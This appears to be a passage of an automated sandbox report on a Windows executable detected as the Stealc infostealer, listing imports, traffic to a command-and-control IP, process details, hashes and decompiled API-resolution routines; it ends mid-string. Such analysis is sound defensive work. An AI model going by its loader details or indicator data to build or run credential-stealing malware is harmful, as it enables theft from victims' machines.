RT_ACCELERATOR	0x27ae3a0	0x28	data			1.025
RT_GROUP_CURSOR	0x27b0aa0	0x22	data			1.0588235294117647
RT_GROUP_CURSOR	0x27b1970	0x14	data			1.25
RT_GROUP_CURSOR	0x27b4060	0x22	data			1.088235294117647
RT_GROUP_ICON	0x27ad730	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x279c440	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x27a6f08	0x68	data	Turkish	Turkey	0.7211538461538461
RT_GROUP_ICON	0x27a2c78	0x76	data	Turkish	Turkey	0.6694915254237288
RT_VERSION	0x27b4088	0x1b0	data			0.5902777777777778

Imports

DLL

Import

KERNEL32.dll

GetComputerNameA, SetProcessAffinityMask, GetNumaNodeProcessorMask, SetDefaultCommConfigA, GetNumaProcessorNode, GetLocaleInfoA, DebugActiveProcessStop, GetConsoleAliasExesLengthA, CallNamedPipeA, UpdateResourceA, DeleteVolumeMountPointA, InterlockedIncrement, MoveFileExW, GetEnvironmentStringsW, GlobalLock, GetTimeFormatA, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, GlobalAlloc, GetSystemWow64DirectoryW, GlobalFlags, HeapCreate, GetNamedPipeInfo, GetConsoleAliasW, SetConsoleCursorPosition, GetFileAttributesW, GetModuleFileNameW, GetConsoleFontSize, GetStringTypeExA, GetStartupInfoA, GetStdHandle, SetLastError, GetProcAddress, VirtualAllocEx, BuildCommDCBW, LoadLibraryA, Process32FirstW, UnhandledExceptionFilter, InterlockedExchangeAdd, OpenWaitableTimerW, SetCalendarInfoW, MoveFileA, SetCommMask, FindAtomA, GetOEMCP, DebugBreakProcess, GetVersionExA, ReadConsoleOutputCharacterW, OpenFileMappingA, LocalFree, LocalFileTimeToFileTime, MultiByteToWideChar, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedDecrement, GetACP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, HeapSize, FreeEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, CloseHandle, FlushFileBuffers, GetModuleHandleA

WINHTTP.dll

WinHttpOpenRequest

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2024 04:42:00.078298092 CET	49730	80	192.168.2.4	194.15.46.65
Oct 29, 2024 04:42:00.084055901 CET	80	49730	194.15.46.65	192.168.2.4
Oct 29, 2024 04:42:00.084247112 CET	49730	80	192.168.2.4	194.15.46.65
Oct 29, 2024 04:42:00.085136890 CET	49730	80	192.168.2.4	194.15.46.65
Oct 29, 2024 04:42:00.091500998 CET	80	49730	194.15.46.65	192.168.2.4
Oct 29, 2024 04:42:08.588251114 CET	80	49730	194.15.46.65	192.168.2.4
Oct 29, 2024 04:42:08.588341951 CET	49730	80	192.168.2.4	194.15.46.65
Oct 29, 2024 04:42:08.588434935 CET	49730	80	192.168.2.4	194.15.46.65
Oct 29, 2024 04:42:08.593831062 CET	80	49730	194.15.46.65	192.168.2.4

HTTP Request Dependency Graph

194.15.46.65

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	194.15.46.65	80	6920	C:\Users\user\Desktop\kNp6KbvVoz.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 04:42:00.085136890 CET	87	OUT	GET / HTTP/1.1 Host: 194.15.46.65 Connection: Keep-Alive Cache-Control: no-cache

Target ID:	0
Start time:	23:41:55
Start date:	28/10/2024
Path:	C:\Users\user\Desktop\kNp6KbvVoz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\kNp6KbvVoz.exe"
Imagebase:	0x400000
File size:	746'496 bytes
MD5 hash:	0C6E0D5C6DE6558EAB55CE5FAD0B8ACD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2089738538.0000000002E39000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	23:42:22
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6920 -s 1332
Imagebase:	0xc60000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	1.4%
Signature Coverage:	4.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	32

Executed Functions

Function 00419F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,02E325E8), ref: 00419F3D
GetProcAddress.KERNEL32(74DD0000,02E328E8), ref: 00419F55
GetProcAddress.KERNEL32(74DD0000,02EB1D88), ref: 00419F6E
GetProcAddress.KERNEL32(74DD0000,02EB1DA0), ref: 00419F86
GetProcAddress.KERNEL32(74DD0000,02EB1EA8), ref: 00419F9E
GetProcAddress.KERNEL32(74DD0000,02EB1EC0), ref: 00419FB7
GetProcAddress.KERNEL32(74DD0000,02E35948), ref: 00419FCF
GetProcAddress.KERNEL32(74DD0000,02EB1E48), ref: 00419FE7
GetProcAddress.KERNEL32(74DD0000,02EB1FC8), ref: 0041A000
GetProcAddress.KERNEL32(74DD0000,02EB2058), ref: 0041A018
GetProcAddress.KERNEL32(74DD0000,02EB2070), ref: 0041A030
GetProcAddress.KERNEL32(74DD0000,02E327E8), ref: 0041A049
GetProcAddress.KERNEL32(74DD0000,02E325C8), ref: 0041A061
GetProcAddress.KERNEL32(74DD0000,02E32588), ref: 0041A079
GetProcAddress.KERNEL32(74DD0000,02E326E8), ref: 0041A092
GetProcAddress.KERNEL32(74DD0000,02EB2088), ref: 0041A0AA
GetProcAddress.KERNEL32(74DD0000,02EB1FF8), ref: 0041A0C2
GetProcAddress.KERNEL32(74DD0000,02E35A88), ref: 0041A0DB
GetProcAddress.KERNEL32(74DD0000,02E325A8), ref: 0041A0F3
GetProcAddress.KERNEL32(74DD0000,02EB2010), ref: 0041A10B
GetProcAddress.KERNEL32(74DD0000,02EB2040), ref: 0041A124
GetProcAddress.KERNEL32(74DD0000,02EB1FE0), ref: 0041A13C
GetProcAddress.KERNEL32(74DD0000,02EB2028), ref: 0041A154
GetProcAddress.KERNEL32(74DD0000,02E32748), ref: 0041A16D
GetProcAddress.KERNEL32(74DD0000,02EB50A8), ref: 0041A185
GetProcAddress.KERNEL32(74DD0000,02EB4FB8), ref: 0041A19D
GetProcAddress.KERNEL32(74DD0000,02EB5048), ref: 0041A1B6
GetProcAddress.KERNEL32(74DD0000,02EB4F28), ref: 0041A1CE
GetProcAddress.KERNEL32(74DD0000,02EB4E98), ref: 0041A1E6
GetProcAddress.KERNEL32(74DD0000,02EB5168), ref: 0041A1FF
GetProcAddress.KERNEL32(74DD0000,02EB50C0), ref: 0041A217
GetProcAddress.KERNEL32(74DD0000,02EB5060), ref: 0041A22F
GetProcAddress.KERNEL32(74DD0000,02EB4FE8), ref: 0041A248
GetProcAddress.KERNEL32(74DD0000,02E34BE0), ref: 0041A260
GetProcAddress.KERNEL32(74DD0000,02EB5018), ref: 0041A278
GetProcAddress.KERNEL32(74DD0000,02EB4EB0), ref: 0041A291
GetProcAddress.KERNEL32(74DD0000,02E32768), ref: 0041A2A9
GetProcAddress.KERNEL32(74DD0000,02EB5108), ref: 0041A2C1
GetProcAddress.KERNEL32(74DD0000,02E32788), ref: 0041A2DA
GetProcAddress.KERNEL32(74DD0000,02EB4FD0), ref: 0041A2F2
GetProcAddress.KERNEL32(74DD0000,02EB4F40), ref: 0041A30A
GetProcAddress.KERNEL32(74DD0000,02E327C8), ref: 0041A323
GetProcAddress.KERNEL32(74DD0000,02E322E8), ref: 0041A33B
LoadLibraryA.KERNEL32(02EB5090,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A34D
LoadLibraryA.KERNEL32(02EB4EC8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A35E
LoadLibraryA.KERNEL32(02EB5030,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A370
LoadLibraryA.KERNEL32(02EB5000,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A382
LoadLibraryA.KERNEL32(02EB5078,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A393
LoadLibraryA.KERNEL32(02EB4FA0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3A5
LoadLibraryA.KERNEL32(02EB50D8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3B7
LoadLibraryA.KERNEL32(02EB50F0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3C8
GetProcAddress.KERNEL32(75290000,02E32388), ref: 0041A3EA
GetProcAddress.KERNEL32(75290000,02EB5120), ref: 0041A402
GetProcAddress.KERNEL32(75290000,02EB20F0), ref: 0041A41A
GetProcAddress.KERNEL32(75290000,02EB5138), ref: 0041A433
GetProcAddress.KERNEL32(75290000,02E324A8), ref: 0041A44B
GetProcAddress.KERNEL32(73440000,02E35768), ref: 0041A470
GetProcAddress.KERNEL32(73440000,02E32228), ref: 0041A489
GetProcAddress.KERNEL32(73440000,02E357E0), ref: 0041A4A1
GetProcAddress.KERNEL32(73440000,02EB5150), ref: 0041A4B9
GetProcAddress.KERNEL32(73440000,02EB4E80), ref: 0041A4D2
GetProcAddress.KERNEL32(73440000,02E321E8), ref: 0041A4EA
GetProcAddress.KERNEL32(73440000,02E321C8), ref: 0041A502
GetProcAddress.KERNEL32(73440000,02EB4EF8), ref: 0041A51B
GetProcAddress.KERNEL32(752C0000,02E32208), ref: 0041A53C
GetProcAddress.KERNEL32(752C0000,02E323E8), ref: 0041A554
GetProcAddress.KERNEL32(752C0000,02EB4EE0), ref: 0041A56D
GetProcAddress.KERNEL32(752C0000,02EB4F10), ref: 0041A585
GetProcAddress.KERNEL32(752C0000,02E32168), ref: 0041A59D
GetProcAddress.KERNEL32(74EC0000,02E35B50), ref: 0041A5C3
GetProcAddress.KERNEL32(74EC0000,02E35B00), ref: 0041A5DB
GetProcAddress.KERNEL32(74EC0000,02EB4F58), ref: 0041A5F3
GetProcAddress.KERNEL32(74EC0000,02E323A8), ref: 0041A60C
GetProcAddress.KERNEL32(74EC0000,02E32448), ref: 0041A624
GetProcAddress.KERNEL32(74EC0000,02E35B28), ref: 0041A63C
GetProcAddress.KERNEL32(75BD0000,02EB4F70), ref: 0041A662
GetProcAddress.KERNEL32(75BD0000,02E322C8), ref: 0041A67A
GetProcAddress.KERNEL32(75BD0000,02EB21E0), ref: 0041A692
GetProcAddress.KERNEL32(75BD0000,02EB4F88), ref: 0041A6AB
GetProcAddress.KERNEL32(75BD0000,02EB5198), ref: 0041A6C3
GetProcAddress.KERNEL32(75BD0000,02E32268), ref: 0041A6DB
GetProcAddress.KERNEL32(75BD0000,02E322A8), ref: 0041A6F4
GetProcAddress.KERNEL32(75BD0000,02EB51F8), ref: 0041A70C
GetProcAddress.KERNEL32(75BD0000,02EB5210), ref: 0041A724
GetProcAddress.KERNEL32(75A70000,02E32308), ref: 0041A746
GetProcAddress.KERNEL32(75A70000,02EB51E0), ref: 0041A75E
GetProcAddress.KERNEL32(75A70000,02EB5228), ref: 0041A776
GetProcAddress.KERNEL32(75A70000,02EB51B0), ref: 0041A78F
GetProcAddress.KERNEL32(75A70000,02EB5240), ref: 0041A7A7
GetProcAddress.KERNEL32(75450000,02E32348), ref: 0041A7C8
GetProcAddress.KERNEL32(75450000,02E32328), ref: 0041A7E1
GetProcAddress.KERNEL32(75DA0000,02E32508), ref: 0041A802
GetProcAddress.KERNEL32(75DA0000,02EB51C8), ref: 0041A81A
GetProcAddress.KERNEL32(6F080000,02E32528), ref: 0041A840
GetProcAddress.KERNEL32(6F080000,02E321A8), ref: 0041A858
GetProcAddress.KERNEL32(6F080000,02E324E8), ref: 0041A870
GetProcAddress.KERNEL32(6F080000,02EB5180), ref: 0041A889
GetProcAddress.KERNEL32(6F080000,02E32468), ref: 0041A8A1
GetProcAddress.KERNEL32(6F080000,02E323C8), ref: 0041A8B9
GetProcAddress.KERNEL32(6F080000,02E32488), ref: 0041A8D2
GetProcAddress.KERNEL32(6F080000,02E32248), ref: 0041A8EA
GetProcAddress.KERNEL32(6F080000,InternetSetOptionA), ref: 0041A901
GetProcAddress.KERNEL32(6F080000,HttpQueryInfoA), ref: 0041A917
GetProcAddress.KERNEL32(75AF0000,02EB5390), ref: 0041A939
GetProcAddress.KERNEL32(75AF0000,02EB21B0), ref: 0041A951
GetProcAddress.KERNEL32(75AF0000,02EB54F8), ref: 0041A969
GetProcAddress.KERNEL32(75AF0000,02EB54B0), ref: 0041A982
GetProcAddress.KERNEL32(75D90000,02E32548), ref: 0041A9A3
GetProcAddress.KERNEL32(6D100000,02EB5480), ref: 0041A9C4
GetProcAddress.KERNEL32(6D100000,02E32288), ref: 0041A9DD
GetProcAddress.KERNEL32(6D100000,02EB5570), ref: 0041A9F5
GetProcAddress.KERNEL32(6D100000,02EB5420), ref: 0041AA0D

Strings

InternetSetOptionA, xrefs: 0041A8F5
HttpQueryInfoA, xrefs: 0041A90C

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
Instruction ID: fc853244e6edf76f870e234c3061c456cb9d9aaab695e8dd72f65461d71d1d70
Opcode Fuzzy Hash: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
Instruction Fuzzy Hash: 98623EB5D1B2549FC344DFA8FC8895677BBA78D301318A61BF909C3674E734A640CB62

Function 00404610 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404648
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,00416C9B), ref: 00404657
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,00416C9B), ref: 0040465E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040466C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404677
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404682
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040468D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404698
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046AC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046B7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046C2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046CD
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046D8
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
strlen.MSVCRT ref: 00404740
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened 